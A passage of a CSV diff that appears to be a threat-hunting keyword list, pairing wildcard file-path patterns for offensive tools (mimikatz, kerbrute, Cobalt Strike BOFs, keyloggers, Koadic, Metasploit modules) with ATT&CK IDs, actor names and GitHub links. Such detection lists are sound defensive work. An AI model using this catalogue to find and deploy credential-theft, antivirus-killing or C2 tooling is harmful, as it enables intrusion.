tools","https://github.com/ka7ana/CVE-2023-23397","1","1","N/A","N/A","1","36","11","2023-03-16T19:29:49Z","2023-03-16T19:10:37Z"
+"*/kali/pool/main/*","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/kali-linux-2023*","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/kali-tools-*","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. 
Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/katoolin3*","offensive_tool_keyword","katoolin3","Katoolin3 brings all programs available in Kali Linux to Debian and Ubuntu.","T1203 - T1090 - T1020","TA0006 - TA0002 - TA0009","N/A","N/A","Exploitation tools","https://github.com/s-h-3-l-l/katoolin3","1","1","N/A","N/A","4","315","103","2020-08-05T17:21:00Z","2019-09-05T13:14:46Z"
+"*/kdstab.*","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/KDStab","1","1","N/A","10","10","146","35","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z"
+"*/KDStab.*","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - 
T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/KDStab","1","1","N/A","10","10","146","35","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z"
+"*/KDStab/*","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - 
APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/KDStab","1","1","N/A","10","10","146","35","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z"
+"*/keepass_discover.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z"
+"*/keepass_discover_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z"
+"*/keepass_trigger.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z"
+"*/KeeThief.git*","offensive_tool_keyword","KeeThiefSyscalls","Patch GhostPack/KeeThief for it to use DInvoke and syscalls","T1003.001 - T1558.002","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/Metro-Holografix/KeeThiefSyscalls","1","1","private github repo","10",,"N/A",,,
+"*/kerberoast.*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z"
+"*/kerberoast.c*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z"
+"*/kerberoast.c*","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","1","N/A","10","10","234","28","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z"
+"*/kerberoast.h*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z"
+"*/kerberoast.py*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z"
+"*/kerberoast/*.*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z"
+"*/kerberoast_hashes_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z"
+"*/kerberos.py*","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z"
+"*/kerberos-ldap-password-hunter*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/oldboy21/LDAP-Password-Hunter","1","1","N/A","10","2","189","27","2023-01-06T15:32:34Z","2021-07-26T14:27:01Z"
+"*/kerberosticket.py*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z"
+"*/kerbrute/*","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","2145","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z"
+"*/KernelMii.c*","offensive_tool_keyword","cobaltstrike","Cobalt Strike (CS) Beacon Object File (BOF) foundation for kernel exploitation using 
CVE-2021-21551.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tijme/kernel-mii","1","1","N/A","10","10","72","27","2023-05-07T18:38:29Z","2022-06-25T11:13:45Z"
+"*/keygen.exe*","greyware_tool_keyword","_","generic suspicious keyword keygen.exe observed in multiple cracked software often packed with malwares","T1204 - T1027 - T1059 - T1055 - T1060 - T1195","TA0005 - TA0002 - TA0011","N/A","N/A","Phishing","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/keylogger.cpp*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1056-001 - T1056-002 - T1056-003 - T1056-004 - T1056-005 - T1003 - T1113 - T1213","TA0006 - TA0009","N/A","N/A","Collection - Credential Access - Exfiltration","https://github.com/trustedsec/SliverKeylogger","1","1","N/A","N/A","2","127","38","2023-09-22T19:39:04Z","2022-06-17T19:32:53Z"
+"*/KeyLogger.cs*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - 
T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z"
+"*/keylogger.exe*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1056-001 - T1056-002 - T1056-003 - T1056-004 - T1056-005 - T1003 - T1113 - T1213","TA0006 - TA0009","N/A","N/A","Collection - Credential Access - Exfiltration","https://github.com/trustedsec/SliverKeylogger","1","1","N/A","N/A","2","127","38","2023-09-22T19:39:04Z","2022-06-17T19:32:53Z"
+"*/keylogger/*.*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z"
+"*/keyscan.go*","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","1","N/A","10","10","451","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z"
+"*/killav.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. 
identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*/killav.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*/KillDefenderBOF*","offensive_tool_keyword","KillDefenderBOF","KillDefenderBOF is a Beacon Object File PoC implementation of pwn1sher/KillDefender - kill defender","T1055.002 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/Cerbersec/KillDefenderBOF","1","1","N/A","10","3","200","29","2022-04-12T17:45:50Z","2022-02-06T21:59:03Z"
+"*/kimi.py*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z"
+"*/kismet*","offensive_tool_keyword","kismet","Kismet is a wireless network and device detector. sniffer. wardriving tool. and WIDS (wireless intrusion detection) framework.","T1016 - T1040 - T1043 - T1052 - T1065 - T1096 - T1102 - T1113 - T1114 - T1123 - T1127 - T1136 - T1143 - T1190 - T1200 - T1201 - T1219 - T1222 - T1496 - T1497 - T1557 - T1560 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0007 - TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/kismetwireless/kismet","1","0","N/A","N/A","10","1299","272","2023-09-29T14:28:16Z","2016-09-20T13:26:00Z"
+"*/kismetwireless/*","offensive_tool_keyword","kismet","Kismet is a wireless network and device detector. sniffer. wardriving tool. 
and WIDS (wireless intrusion detection) framework.","T1016 - T1040 - T1043 - T1052 - T1065 - T1096 - T1102 - T1113 - T1114 - T1123 - T1127 - T1136 - T1143 - T1190 - T1200 - T1201 - T1219 - T1222 - T1496 - T1497 - T1557 - T1560 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0007 - TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/kismetwireless/kismet","1","1","N/A","N/A","10","1299","272","2023-09-29T14:28:16Z","2016-09-20T13:26:00Z"
+"*/kitrap0d.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*/kittens/haloKitten*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. 
The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z"
+"*/kittens/recycleKitten*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z"
+"*/KittyStager/*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z"
+"*/kiwi.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*/kiwi_passwords.yar*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z"
+"*/klezVirus/CandyPotato*","offensive_tool_keyword","CandyPotato","CandyPotato - Pure C++ weaponized fully automated implementation of RottenPotatoNG. 
This tool has been made on top of the original JuicyPotato with the main focus on improving and adding some functionalities which was lacking","T1547.004","TA0002","N/A","N/A","Exploitation tools","https://github.com/klezVirus/CandyPotato","1","1","N/A","N/A","3","289","67","2021-09-16T17:08:52Z","2020-08-21T17:14:30Z"
+"*/knqyf263/CVE-2022-0847*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/knqyf263/CVE-2022-0847","1","1","N/A","N/A","1","46","9","2022-03-08T13:54:08Z","2022-03-08T13:48:55Z"
+"*/knx-gateway-discover.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/knx-gateway-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/Koadic*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1059.005 - T1059.007 - T1021 - T1547.001 - T1055 - T1012","TA0002 - TA0005 - TA0007 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/zerosum0x0/koadic","1","0","N/A","10","10","N/A","N/A","N/A","N/A"
+"*/koadic.git*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z"
+"*/Koh/*.cs*","offensive_tool_keyword","cobaltstrike","Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - 
T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/GhostPack/Koh","1","1","N/A","10","10","447","59","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z"
+"*/KrakenMask.git*","offensive_tool_keyword","KrakenMask","A sleep obfuscation tool is used to encrypt the content of the .text section with RC4 (using SystemFunction032). To achieve this encryption a ROP chain is employed with QueueUserAPC and NtContinue.","T1027 - T1027.002 - T1055 - T1055.011 - T1059 - T1059.003","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/RtlDallas/KrakenMask","1","1","N/A","9","2","144","28","2023-08-08T15:21:28Z","2023-08-05T19:24:36Z"
+"*/krb5/*.py","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z"
+"*/krb5-enum-users.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
